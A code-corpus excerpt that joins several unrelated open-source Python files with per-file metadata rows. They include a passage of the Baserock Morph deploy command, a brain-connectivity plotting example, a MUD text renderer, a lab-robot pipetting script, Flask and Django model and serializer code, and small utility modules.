ones provided by Morph are listed above, but users may also
create their own by adding them in the same git repository
and branch as the system morphology. A write extension is a
script that does whatever is needed for the deployment. A write
extension is passed two command line parameters: the name of an
unpacked directory tree that contains the system files (after
configuration, see below), and the `location` parameter.
Regardless of the type of deployment, the image may be
configured for a specific deployment by using **configuration
extensions**. The extensions are listed in the system morphology
file:
...
configuration-extensions:
- set-hostname
The above specifies that the extension `set-hostname` is to
be run. Morph will run all the configuration extensions listed
in the system morphology, and no others. (This way, configuration
is more easily tracked in git.)
Configuration extensions are scripts that get the unpacked
directory tree of the system as their parameter, and do whatever
is needed to configure the tree.
Morph provides the following configuration extension built in:
* `set-hostname` sets the hostname of the system to the value
of the `HOSTNAME` variable.
* `nfsboot` configures the system for nfsbooting. This MUST
be used when deploying with the `nfsboot` write extension.
Any `KEY=VALUE` parameters given in `deploy` or `deploy-defaults`
sections of the cluster morphology, or given through the command line
are set as environment variables when either the configuration or the
write extension runs (except `type` and `location`).
Deployment configuration is stored in the deployed system as
/baserock/deployment.meta. THIS CONTAINS ALL ENVIRONMENT VARIABLES SET
DURING DEPLOYMENT, so make sure you have no sensitive information in
your environment that is being leaked. As a special case, any
environment/deployment variable that contains 'PASSWORD' in its name is
stripped out and not stored in the final system.
'''
# Nasty hack to allow deploying things of a different architecture
def validate(self, root_artifact):
pass
morphlib.buildcommand.BuildCommand._validate_architecture = validate
if not args:
raise cliapp.AppException(
'Too few arguments to deploy command (see help)')
# Raise an exception if there is not enough space in tempdir
# / for the path and 0 for the minimum size is a no-op
# it exists because it is complicated to check the available
# disk space given dirs may be on the same device
morphlib.util.check_disk_available(
self.app.settings['tempdir'],
self.app.settings['tempdir-min-space'],
'/', 0)
ws = morphlib.workspace.open('.')
sb = morphlib.sysbranchdir.open_from_within('.')
cluster_filename = morphlib.util.sanitise_morphology_path(args[0])
cluster_filename = sb.relative_to_root_repo(cluster_filename)
build_uuid = uuid.uuid4().hex
build_command = morphlib.buildcommand.BuildCommand(self.app)
build_command = self.app.hookmgr.call('new-build-command',
build_command)
loader = morphlib.morphloader.MorphologyLoader()
name = morphlib.git.get_user_name(self.app.runcmd)
email = morphlib.git.get_user_email(self.app.runcmd)
build_ref_prefix = self.app.settings['build-ref-prefix']
root_repo_dir = morphlib.gitdir.GitDirectory(
sb.get_git_directory_name(sb.root_repository_url))
cluster_text = root_repo_dir.read_file(cluster_filename)
cluster_morphology = loader.load_from_string(cluster_text,
filename=cluster_filename)
if cluster_morphology['kind'] != 'cluster':
raise cliapp.AppException(
"Error: morph deployment commands are only supported for "
"cluster morphologies.")
# parse the rest of the args
all_subsystems = set()
all_deployments = set()
deployments = set()
for system in cluster_morphology['systems']:
all_deployments.update(system['deploy'].iterkeys())
if 'subsystems' in system:
all_subsystems.update(loader._get_subsystem_names(system))
for item in args[1:]:
if not item in all_deployments:
break
deployments.add(item)
env_vars = args[len(deployments) + 1:]
self.validate_deployment_options(
env_vars, all_deployments, all_subsystems)
if self.app.settings['local-changes'] == 'include':
bb = morphlib.buildbranch.BuildBranch(sb, build_ref_prefix)
pbb = morphlib.buildbranch.pushed_build_branch(
bb, loader=loader, changes_need_pushing=False,
name=name, email=email, build_uuid=build_uuid,
status=self.app.status)
with pbb as (repo, commit, original_ref):
self.deploy_cluster(build_command, cluster_morphology,
root_repo_dir, repo, commit, env_vars,
deployments)
else:
repo = sb.get_config('branch.root')
ref = sb.get_config('branch.name')
commit = root_repo_dir.resolve_ref_to_commit(ref)
self.deploy_cluster(build_command, cluster_morphology,
root_repo_dir, repo, commit, env_vars,
deployments)
self.app.status(msg='Finished deployment')
def validate_deployment_options(
self, env_vars, all_deployments, all_subsystems):
for var in env_vars:
for subsystem in all_subsystems:
if subsystem == var:
raise cliapp.AppException(
'Cannot directly deploy subsystems. Create a top '
'level deployment for the subsystem %s instead.' %
subsystem)
if (not any(deployment in var
for deployment in all_deployments)
and not subsystem in var):
raise cliapp.AppException(
'Variable referenced a non-existent deployment '
'name: %s' % var)
def deploy_cluster(self, build_command, cluster_morphology, root_repo_dir,
repo, commit, env_vars, deployments):
# Create a tempdir for this deployment to work in
deploy_tempdir = tempfile.mkdtemp(
dir=os.path.join(self.app.settings['tempdir'], 'deployments'))
try:
for system in cluster_morphology['systems']:
self.deploy_system(build_command, deploy_tempdir,
root_repo_dir, repo, commit, system,
env_vars, deployments,
parent_location='')
finally:
shutil.rmtree(deploy_tempdir)
def deploy_system(self, build_command, deploy_tempdir,
root_repo_dir, build_repo, ref, system, env_vars,
deployment_filter, parent_location):
sys_ids = set(system['deploy'].iterkeys())
if deployment_filter and not \
any(sys_id in deployment_filter for sys_id in sys_ids):
return
old_status_prefix = self.app.status_prefix
system_status_prefix = '%s[%s]' % (old_status_prefix, system['morph'])
self.app.status_prefix = system_status_prefix
try:
# Find the artifact to build
morph = morphlib.util.sanitise_morphology_path(system['morph'])
srcpool = build_command.create_source_pool(build_repo, ref, morph)
artifact = build_command.resolve_artifacts(srcpool)
deploy_defaults = system.get('deploy-defaults', {})
for system_id, deploy_params in system['deploy'].iteritems():
if not system_id in deployment_filter and deployment_filter:
continue
deployment_status_prefix = '%s[%s]' % (
system_status_prefix, system_id)
self.app.status_prefix = deployment_status_prefix
try:
user_env = morphlib.util.parse_environment_pairs(
os.environ,
[pair[len(system_id)+1:]
for pair in env_vars
if pair.startswith(system_id)])
final_env = dict(deploy_defaults.items() +
deploy_params.items() +
user_env.items())
is_upgrade = ('yes' if self.app.settings['upgrade']
else 'no')
final_env['UPGRADE'] = is_upgrade
deployment_type = final_env.pop('type', None)
if not deployment_type:
raise morphlib.Error('"type" is undefined '
'for system "%s"' % system_id)
location = final_env.pop('location', None)
if not location:
raise morphlib.Error('"location" is undefined '
'for system "%s"' % system_id)
morphlib.util.sanitize_environment(final_env)
self.check_deploy(root_repo_dir, ref, deployment_type,
location, final_env)
system_tree = self.setup_deploy(build_command,
deploy_tempdir,
root_repo_dir,
ref, artifact,
deployment_type,
location, final_env)
for subsystem in system.get('subsystems', []):
self.deploy_system(build_command, deploy_tempdir,
root_repo_dir, build_repo,
ref, subsystem, env_vars, [],
parent_location=system_tree)
if parent_location:
deploy_location = os.path.join(parent_location,
location.lstrip('/'))
else:
deploy_location = location
self.run_deploy_commands(deploy_tempdir, final_env,
artifact, root_repo_dir,
ref, deployment_type,
system_tree, deploy_location)
finally:
self.app.status_prefix = system_status_prefix
finally:
self.app.status_prefix = old_status_prefix
def upgrade(self, args):
'''Upgrade an existing set of instances using built images.
See `morph help deploy` for documentation.
'''
if not args:
raise cliapp.AppException(
'Too few arguments to upgrade command (see `morph help '
'deploy`)')
if self.app.settings['upgrade']:
raise cliapp.AppException(
'Running `morph upgrade --upgrade` does not make sense.')
self.app.settings['upgrade'] = True
self.deploy(args)
def check_deploy(self, root_repo_dir, ref, deployment_type, location, env):
# Run optional write check extension. These are separate from the write
# extension because it may be several minutes before the write
# extension itself has the chance to raise an error.
try:
self._run_extension(
root_repo_dir, deployment_type, '.check',
[location], env)
except morphlib.extensions.ExtensionNotFoundError:
pass
def setup_deploy(self, build_command, deploy_tempdir, root_repo_dir, ref,
artifact, deployment_type, location, env):
# deployment_type, location and env are only used for saving metadata
# Create a tempdir to extract the rootfs in
system_tree = tempfile.mkdtemp(dir=deploy_tempdir)
try:
# Unpack the artifact (tarball) to a temporary directory.
self.app.status(msg='Unpacking system for configuration')
if build_command.lac.has(artifact):
f = build_command.lac.get(artifact)
elif build_command.rac.has(artifact):
build_command.cache_artifacts_locally([artifact])
f = build_command.lac.get(artifact)
else:
raise cliapp.AppException('Deployment failed as system is'
' not yet built.\nPlease ensure'
' the system is built before'
' deployment.')
tf = tarfile.open(fileobj=f)
tf.extractall(path=system_tree)
self.app.status(
msg='System unpacked at %(system_tree)s',
system_tree=system_tree)
self.app.status(
msg='Writing deployment metadata file')
metadata = self.create_metadata(
artifact, root_repo_dir, deployment_type, location, env)
metadata_path = os.path.join(
system_tree, 'baserock', 'deployment.meta')
with morphlib.savefile.SaveFile(metadata_path, 'w') as f:
json.dump(metadata, f, indent=4,
sort_keys=True, encoding='unicode-escape')
return system_tree
except Exception:
shutil.rmtree(system_tree)
raise
def run_deploy_commands(self, deploy_tempdir, env, artifact, root_repo_dir,
ref, deployment_type, system_tree, location):
# Extensions get a private tempdir so we can more easily clean
# up any files an extension left behind
deploy_private_tempdir = tempfile.mkdtemp(dir=deploy_tempdir)
env['TMPDIR'] = deploy_private_tempdir
try:
# Run configuration extensions.
self.app.status(msg='Configure system')
names = artifact.source.morphology['configuration-extensions']
for name in names:
self._run_extension(
root_repo_dir,
name,
'.configure',
[system_tree],
env)
# Run write extension.
self.app.status(msg='Writing to device')
self._run_extension(
root_repo_dir,
deployment_type,
'.write',
[system_tree, location],
env)
finally:
# Cleanup.
self.app.status(msg='Cleaning up')
shutil.rmtree(deploy_private_tempdir)
def _report_extension_stdout(self, line):
self.app.status(msg=line.replace('%s', '%%'))
def _report_extension_stderr(self, error_list):
def cb(line):
error_list.append(line)
sys.stderr.write('%s\n' % line)
return cb
def _report_extension_logger(self, name, kind):
return lambda line: logging.debug('%s%s: %s', name, kind, line)
def _run_extension(self, gd, name, kind, args, env):
'''Run an extension.
The ``kind`` should be either ``.configure`` or ``.write``,
depending on the kind of extension that is sought.
The extension is found either in the git repository of the
system morphology (repo, ref), or with the Morph code.
'''
error_list = []
with morphlib.extensions.get_extension_filename(name, kind) as fn:
ext = morphlib.extensions.ExtensionSubprocess(
report_stdout=self._report_extension_stdout,
report_stderr=self._report_extension_stderr(error_list),
report_logger=self._report_extension_logger(name, kind),
)
returncode = ext.run(fn, args, env=env, cwd=gd.dirname)
if returncode == 0:
logging.info('%s%s succeeded', name, kind)
else:
message = '%s%s failed with code %s: %s' % (
name, kind, returncode, '\n'.join(error_list))
raise cliapp.AppException(message)
def create_metadata(self, system_artifact, root_repo_dir, deployment_type,
location, env):
'''Deployment-specific metadata.
The `build` and `deploy` operations must be from the same ref, so full
info on the root repo that the system came from is in
/baserock/${system_artifact}.meta and is not duplicated here. We do
store a `git describe` of the definitions.git repo as a convenience for
post-upgrade hooks that we may need to implement at a future date:
the `git describe` output lists the last tag, which will hopefully help
us to identify which release of a system was deployed without having to
keep a list of SHA1s somewhere or query a Trove.
'''
def remove_passwords(env):
is_password = morphlib.util.env_variable_is_password
return { k:v for k, v in env.iteritems() if not is_password(k) }
meta = {
'system-artifact-name': system_artifact.name,
'configuration': remove_passwords(env),
'deployment-type': deployment_type,
'location': location,
'definitions-version': {
'describe': root_repo_dir.describe(),
},
'morph-version': {
'ref': morphlib.gitversion.ref,
'tree': morphlib.gitversion.tree,
'commit': morphlib.gitversion.commit,
'version': morphlib.gitversion.version,
},
}
return meta
|
gpl-2.0
| -7,916,551,351,011,835,000
| 42.882698
| 79
| 0.57351
| false
| 4.669683
| true
| false
| false
|
pravsripad/jumeg
|
examples/connectivity/plot_grouped_connectivity_circle.py
|
2
|
1374
|
#!/usr/bin/env python
'''
Example showing how to read grouped aparc labels from yaml file and plot
grouped connectivity circle with these labels.
Author: Praveen Sripad <pravsripad@gmail.com>
'''
import numpy as np
from jumeg import get_jumeg_path
from jumeg.connectivity import plot_grouped_connectivity_circle
import yaml
labels_fname = get_jumeg_path() + '/data/desikan_label_names.yaml'
yaml_fname = get_jumeg_path() + '/data/desikan_aparc_cortex_based_grouping.yaml'
replacer_dict_fname = get_jumeg_path() + '/data/replacer_dictionaries.yaml'
with open(labels_fname, 'r') as f:
label_names = yaml.safe_load(f)['label_names']
with open(replacer_dict_fname, 'r') as f:
replacer_dict = yaml.safe_load(f)['replacer_dict_aparc']
# make a random matrix with 68 nodes
# use simple seed for reproducibility
np.random.seed(42)
con = np.random.random((68, 68))
con[con < 0.5] = 0.
indices = (np.array((1, 2, 3)), np.array((5, 6, 7)))
plot_grouped_connectivity_circle(yaml_fname, con, label_names,
labels_mode='replace',
replacer_dict=replacer_dict,
out_fname='example_grouped_con_circle.png',
colorbar_pos=(0.1, 0.1),
n_lines=10, colorbar=True,
colormap='viridis')
|
bsd-3-clause
| -3,088,841,760,635,333,600
| 35.157895
| 80
| 0.624454
| false
| 3.202797
| false
| false
| false
|
buckets1337/UOMUMM
|
src/Renderer.py
|
1
|
5959
|
# Renderer.py
# Various ways to format text output to players
class Renderer():
'''
A renderer component just contains methods for formatting text output in various ways
'''
def __init__(self, server):
self.owner = server
def formatMessage(self, message, width):
'''
splits a <message> string into lines that are <width> characters long without breaking words
apart across lines. Broken apart single lines are slightly indented on every line other than
the first in the final formatted message.
Returns the formatted message string.
'''
count = 0
formatted = ''
if message == None:
message = 'None'
for character in range(0,len(message)):
char = message[character]
if char != '\n':
if count < width:
formatted += char
count += 1
#print formatted
else:
if message[character] == ' ':
formatted += "\n" + char
count = 2
#print 'da TRUTH'
else:
collecting = True
coll = ''
i = 1
while collecting:
if message[character-i] != '\n':
coll += message[character-i]
i += 1
else:
collecting = False
if ' ' not in coll.strip():
#print 'TRUE'
formatted += "\n " + char
count = 2
else:
#print 'checking...'
checking = True
i = 1
while checking:
msg = message.strip()
chk = msg[character-i]
#print chk
if chk == ' ':
#print formatted
formatted = formatted[:-i] + "\n" + formatted[-i:] + char
#print formatted
count = i + 1
checking = False
else:
i += 1
else:
formatted += char
count = 0
return formatted
def messageBox(self, client, title, message):
'''
displays a simple <message> in a box for <client>.
The box resizes to fit the message and title.
Has a <title> at the top of the box along the border.
'''
message = self.formatMessage(message, 76)
#print message
if message.endswith("\n"):
message = message[:-1]
msgLines = message.split('\n')
#print msgLines
finalMsg = ''
longest = 0
for line in msgLines:
if len(line) > longest:
longest = len(line)
for line in msgLines:
if longest > len(str(title)):
if longest > len(line):
mod = longest - len(line)
line = line + ((mod) * " ")
# else:
# line = line + ((len(str(title)) - 4) * " ")
else:
mod = (len(str(title)) + 2) - len(line)
line = line + (mod * " ")
line = " | " + line + " |\n"
finalMsg += line
#print int((0.5)*float(longest))
if longest >= len(str(title)):
titleLine = "\n " + (int((0.5)*float(longest - len(str(title)))+1)* "_") + "^!"+str(title)+"^~" + (int((0.5)*float(longest - len(str(title)))+1)* "_") + "\n"
titleLineLen = len(titleLine) - 6
if titleLineLen > (longest + 2):
#print len(titleLine)
#print longest + 2
diff = titleLineLen - (longest + 2) - 1
if not diff <= 0:
titleLine = titleLine[:-diff] + "\n"
if diff == 0:
titleLine = titleLine[:-1] + "_\n"
elif (longest + 2) >= titleLineLen:
diff = (longest + 2) - titleLineLen
if titleLine.endswith("\n"):
titleLine = titleLine[:-1]
titleLine += (diff * "_") + "\n"
client.send_cc(titleLine)
client.send_cc(" |" + ((longest + 2)*" ") + "|\n")
client.send_cc(finalMsg)
client.send_cc(" |" + ((longest + 2)*"_") + "|\n\n")
else:
client.send_cc("\n __^!" + str(title) + "^~__\n")
client.send_cc(" |" + ((4 + len(str(title))) * " ") + "|\n")
client.send_cc(finalMsg)
client.send_cc(" |" + ((4 + len(str(title))) * "_") + "|\n\n")
def roomDisplay(self, client, room):
'''
renders the typical display for a room to client
'''
namePad = 80 - len(room.name) - 2
client.send_cc("\n")
message = "+" + ("-" * (int(0.5 *namePad)-1)) + "^! " + str(room.name) + " ^~" + ("-" * (int(0.5* namePad)-1)) + "+" + "\n"
if len(message) < 81:
message = "+" + ("-" * (int(0.5 *namePad)-1)) + "^! " + str(room.name) + " ^~" + ("-" * (int(0.5* namePad)-1)) + "-+" + "\n"
client.send_cc(message)
# client.send_cc("|" + (" " * 78) + "|" + "\n")
descrip = self.formatMessage(room.description, 76)
desc = descrip.split("\\n")
#print desc
for line in desc:
linePad = 80 - len(line) - 2
if len(line) > 0:
message = "|" +(" " * (int(0.5 *linePad))) + line +(" " * (int(0.5 *linePad))) + "|" + "\n"
if len(message) < 81:
message = ("|" +(" " * (int(0.5 *linePad))) + line +(" " * (int(0.5 *linePad))) + " |" + "\n")
client.send_cc(message)
else:
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("+" + ("-" * 78) + "+" + "\n")
client.send_cc("|" + (" " * 78) + "|" + "\n")
#print "players: " + str(room.players)
for player in room.players:
if player.connection != client:
playerPad = int(80 - len(player.name) - 3)
client.send_cc("| " + "^C" + str(player.name) + "^~" + (" " * playerPad) + "|" + "\n")
else:
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("|" + (" " * 78) + "|" + "\n")
exitList = []
if room.orderedExits == []:
#print 'test'
#print room.exits
for exit in room.exits:
#print room.exits[exit]
exitList.append(str(room.exits[exit]))
room.orderedExits = exitList
else:
for rm in room.orderedExits:
exitList.append(str(rm[1]))
#print exitList
if exitList != []:
lenExit = len(exitList[0])
else:
lenExit = 0
firstPad = int(80 - lenExit - 12)
if exitList != []:
msg = "| " + "^!exits:^~ 1." + exitList[0] + (" " * firstPad) + "|" + "\n"
client.send_cc(msg)
i = 2
for exit in exitList[1:]:
pad = int(80 - len(exitList[i-1]) - 12)
client.send_cc("| " + str(i) + "." + exitList[i-1] + (" " * pad) + "|" + "\n")
i += 1
else:
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("+" + ("-" * 78) + "+" + "\n")
|
apache-2.0
| -8,190,471,305,137,985,000
| 28.8
| 161
| 0.52492
| false
| 2.802916
| false
| false
| false
|
tdlong/YeastRobot
|
UserPrograms/ASE/Rearray_day3_pilot_1.py
|
1
|
1439
|
import sys
# where RobotControl.py, etc lives
sys.path.append('/home/pi/Desktop/ADL/YeastRobot/PythonLibrary')
from RobotControl import *
#################################
### Define Deck Layout
#################################
deck="""\
DW96W SW96P SW96P SW96P SW96P SW96P SW96P BLANK
BLANK BLANK BLANK BLANK BLANK BLANK BLANK BLANK
BLANK BLANK BLANK BLANK BLANK BLANK BLANK BLANK
BLANK BLANK BLANK BLANK BLANK BLANK BLANK BLANK
"""
# 2 3 4 5 6
# note the 1st user defined column is "2" not zero or one, since tips are at 0 & 1
##################################
myvol = 140
# 1 = UL of BoxA, 2 = UR of BoxA, 3 = LL of BoxA, etc.
OffsetDict={0: 'UL', 1: 'UR', 2: 'LL', 3: 'LR'}
# read in deck, etc
DefineDeck(deck)
printDeck()
InitializeRobot()
CurrentTipPosition = 1
for offset in [0,1,2,3]:
CurrentTipPosition = retrieveTips(CurrentTipPosition)
extraSeatTips()
# initial mix
position(0,2, position = OffsetDict[offset])
mix(300,98,100,5)
# From DW96W to SW96P with 140ul of glycerol
# 6 replicate glycerol stocks
for i in [3,4,5,6,7,8]:
position(0,2, position = OffsetDict[offset])
aspirate(myvol,depth=99,speed=50, mix=3)
position(0,i, position = OffsetDict[offset])
moveDispense(myvol, startdepth = 95, enddepth=60, speed = 50)
disposeTips()
position(0,0)
ShutDownRobot()
quit()
|
gpl-3.0
| -2,579,611,862,031,048,700
| 27.215686
| 84
| 0.603892
| false
| 2.699812
| false
| false
| false
|
cchristelis/watchkeeper
|
django_project/healthsites/utils.py
|
1
|
1525
|
__author__ = 'Irwan Fathurrahman <irwan@kartoza.com>'
__date__ = '25/04/16'
__license__ = "GPL"
__copyright__ = 'kartoza.com'
import os
import json
from django.conf import settings
from django.core.serializers.json import DjangoJSONEncoder
from healthsites.map_clustering import cluster, parse_bbox
from healthsites.models.healthsite import Healthsite
def healthsites_clustering(bbox, zoom, iconsize):
# parse request params
if zoom <= settings.CLUSTER_CACHE_MAX_ZOOM:
# if geoname and tag are not set we can return the cached layer
# try to read healthsitesfrom disk
filename = os.path.join(
settings.CLUSTER_CACHE_DIR,
'{}_{}_{}_healthsites.json'.format(zoom, *iconsize)
)
try:
cached_locs = open(filename, 'rb')
cached_data = cached_locs.read()
return cached_data
except IOError as e:
localities = Healthsite.objects.all()
object_list = cluster(localities, zoom, *iconsize)
# create the missing cache
with open(filename, 'wb') as cache_file:
json_dump = json.dump(object_list, cache_file)
return json_dump
else:
# make polygon
bbox_poly = parse_bbox(bbox)
# cluster healthsites for a view
healthsites = Healthsite.objects.filter(point_geometry__contained=bbox_poly)
object_list = cluster(healthsites, zoom, *iconsize)
return json.dumps(object_list, cls=DjangoJSONEncoder)
|
bsd-2-clause
| -7,391,638,456,330,655,000
| 34.465116
| 84
| 0.64
| false
| 3.84131
| false
| false
| false
|
kmerenkov/clitter
|
setup.py
|
1
|
1981
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2008, Konstantin Merenkov <kmerenkov@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Konstantin Merenkov <kmerenkov@gmail.com> ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Konstantin Merenkov <kmerenkov@gmail.com> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from distutils.core import setup
setup(name='clitter',
version='0.1',
description='Command line twitter client',
author='Konstantin Merenkov',
author_email='kmerenkov@gmail.com',
url='http://github.com/kmerenkov/clitter/',
packages=['clitter/twitter', 'clitter'],
scripts=['bin/clitter'])
|
bsd-3-clause
| 7,848,016,887,700,294,000
| 52.540541
| 91
| 0.745583
| false
| 4.084536
| false
| false
| false
|
Debian/dak
|
daklib/termcolor.py
|
1
|
1725
|
# vim:set et sw=4:
"""
TermColor utils for dak
@contact: Debian FTP Master <ftpmaster@debian.org>
@copyright: 2019 Mo Zhou <lumin@debian.org>
@license: GNU General Public License version 2 or later
"""
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
###############################################################################
__all__ = []
###############################################################################
_COLORS_ = ('red', 'green', 'yellow', 'blue', 'violet', 'cyan', 'white')
_COLOR_CODES_ = {k: 31 + _COLORS_.index(k) for k in _COLORS_}
def colorize(s, fg, bg=None, bold=False, ul=False):
'''
s: str -- string to be colorized
fg: str/int -- foreground color. See _COLORS_ for choices
bg: str/int -- background color. See _COLORS_ for choices
bold: bool -- bold font?
ul: bool -- underline?
'''
if fg not in _COLORS_:
raise ValueError("Unsupported foreground Color!")
if (bg is not None) or any((bold, ul)):
raise NotImplementedError
return "\x1b[{}m{}\x1b[0;m".format(_COLOR_CODES_[fg], s)
|
gpl-2.0
| -1,461,835,152,391,277,600
| 36.5
| 79
| 0.624928
| false
| 3.938356
| false
| false
| false
|
alissonpintor/stoky
|
app/basemodel.py
|
1
|
1966
|
from flask_sqlalchemy import Model
from sqlalchemy import exc as core_exc
from sqlalchemy.orm import exc
class Result(object):
"""
Classe que recebe o resultado
"""
def __init__(self, status, message):
self.status = status
self.message = message
class BaseModel(Model):
"""
classe Model base que contem metodos comuns
como delete, search by id, update
"""
def update(self):
from app import db
try:
db.session.add(self)
db.session.commit()
return Result(status=True, message='Registro realizado com sucesso')
except Exception as e:
return Result(status=False, message=str(e))
def delete(self):
from app import db
try:
db.session.delete(self)
db.session.commit()
return Result(status=True, message='Registro excluído com sucesso')
except core_exc.IntegrityError:
return Result(status=False, message='Não foi possível excluir. Erro de Integridade')
except Exception as e:
return Result(status=False, message=str(e))
@classmethod
def by_id(cls, id):
from app import db
primary_key = db.inspect(cls).primary_key[0]
data = db.session.query(
cls
).filter(
primary_key==id
).first()
return data
@classmethod
def by(cls, **kwargs):
from app import db
data = db.session.query(cls)
for k, v in kwargs.items():
if k.upper() in cls.__table__.columns.keys():
column = cls.__table__.columns[k.upper()]
data = data.filter(column==v)
data = data.first()
return data
@classmethod
def all(cls):
from app import db
data = cls.query.all()
return data
|
gpl-3.0
| -4,292,930,550,900,183,600
| 24.842105
| 96
| 0.545593
| false
| 4.248918
| false
| false
| false
|
brigittebigi/proceed
|
proceed/src/wxgui/sp_icons.py
|
1
|
2562
|
import os.path
from sp_glob import ICONS_PATH
# Frames
APP_ICON = os.path.join(ICONS_PATH, "app.ico")
APP_CHECK_ICON = os.path.join(ICONS_PATH, "appcheck.ico")
APP_EXPORT_PDF_ICON = os.path.join(ICONS_PATH, "appexport-pdf.ico")
# For the toolbar of the main frame
EXIT_ICON = os.path.join(ICONS_PATH, "exit.png")
OPEN_ICON = os.path.join(ICONS_PATH, "open.png")
SAVE_ICON = os.path.join(ICONS_PATH, "save.png")
CHECK_ICON = os.path.join(ICONS_PATH, "check.png")
EXPORT_ICON = os.path.join(ICONS_PATH, "export.png")
ADD_ICON = os.path.join(ICONS_PATH, "add.png")
EDIT_ICON = os.path.join(ICONS_PATH, "edit.png")
DELETE_ICON = os.path.join(ICONS_PATH, "delete.png")
ABOUT_ICON = os.path.join(ICONS_PATH, "about.png")
FEEDBACK_ICON = os.path.join(ICONS_PATH, "feedback.png")
CANCEL_ICON = os.path.join(ICONS_PATH, "cancel.png")
APPLY_ICON = os.path.join(ICONS_PATH, "apply.png")
HELP_ICON = os.path.join(ICONS_PATH, "help.png" )
FORWARD_ICON = os.path.join(ICONS_PATH, "forward.png" )
BACKWARD_ICON = os.path.join(ICONS_PATH, "backward.png" )
NEXT_ICON = os.path.join(ICONS_PATH, "next.png")
PREVIOUS_ICON = os.path.join(ICONS_PATH, "previous.png")
HOME_ICON = os.path.join(ICONS_PATH, "home.png" )
LOGOUT_ICON = os.path.join(ICONS_PATH, "logout.png" )
SETTINGS_ICON = os.path.join(ICONS_PATH, "settings.png" )
# For the other frames
AUTHOR_ICON = os.path.join(ICONS_PATH, "author.png")
DOCUMENT_ICON = os.path.join(ICONS_PATH, "document.png")
SESSION_ICON = os.path.join(ICONS_PATH, "session.png")
CONFERENCE_ICON = os.path.join(ICONS_PATH, "conference.png")
IMPORT_EXPORT_ICON = os.path.join(ICONS_PATH, "import-export.png")
GRID_ICON = os.path.join(ICONS_PATH, "grid.png")
TEX_ICON = os.path.join(ICONS_PATH, "tex.png")
WWW_ICON = os.path.join(ICONS_PATH, "www.png")
PROCESS_ICON = os.path.join(ICONS_PATH, "process.png")
# For the Feedback form
MAIL_DEFAULT_ICON = os.path.join(ICONS_PATH, "maildefault.png")
MAIL_GMAIL_ICON = os.path.join(ICONS_PATH, "mailgoogle.png")
MAIL_OTHER_ICON = os.path.join(ICONS_PATH, "mailother.png")
CHECKED_ICON = os.path.join(ICONS_PATH, "check.ico")
UNCHECKED_ICON = os.path.join(ICONS_PATH, "uncheck.ico")
RADIOCHECKED_ICON = os.path.join(ICONS_PATH, "radiocheck.ico")
RADIOUNCHECKED_ICON = os.path.join(ICONS_PATH, "radiouncheck.ico")
|
gpl-3.0
| 8,382,389,665,049,526,000
| 46.444444
| 67
| 0.639344
| false
| 2.660436
| false
| false
| false
|
bdang2012/taiga-back-casting
|
taiga/external_apps/serializers.py
|
1
|
2126
|
# Copyright (C) 2014-2015 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014-2015 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2015 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import json
from taiga.base.api import serializers
from . import models
from . import services
from django.utils.translation import ugettext as _
class ApplicationSerializer(serializers.ModelSerializer):
class Meta:
model = models.Application
fields = ("id", "name", "web", "description", "icon_url")
class ApplicationTokenSerializer(serializers.ModelSerializer):
cyphered_token = serializers.CharField(source="cyphered_token", read_only=True)
next_url = serializers.CharField(source="next_url", read_only=True)
application = ApplicationSerializer(read_only=True)
class Meta:
model = models.ApplicationToken
fields = ("user", "id", "application", "auth_code", "next_url")
class AuthorizationCodeSerializer(serializers.ModelSerializer):
next_url = serializers.CharField(source="next_url", read_only=True)
class Meta:
model = models.ApplicationToken
fields = ("auth_code", "state", "next_url")
class AccessTokenSerializer(serializers.ModelSerializer):
cyphered_token = serializers.CharField(source="cyphered_token", read_only=True)
next_url = serializers.CharField(source="next_url", read_only=True)
class Meta:
model = models.ApplicationToken
fields = ("cyphered_token", )
|
agpl-3.0
| -6,451,691,023,716,321,000
| 36.928571
| 83
| 0.733992
| false
| 3.827027
| false
| false
| false
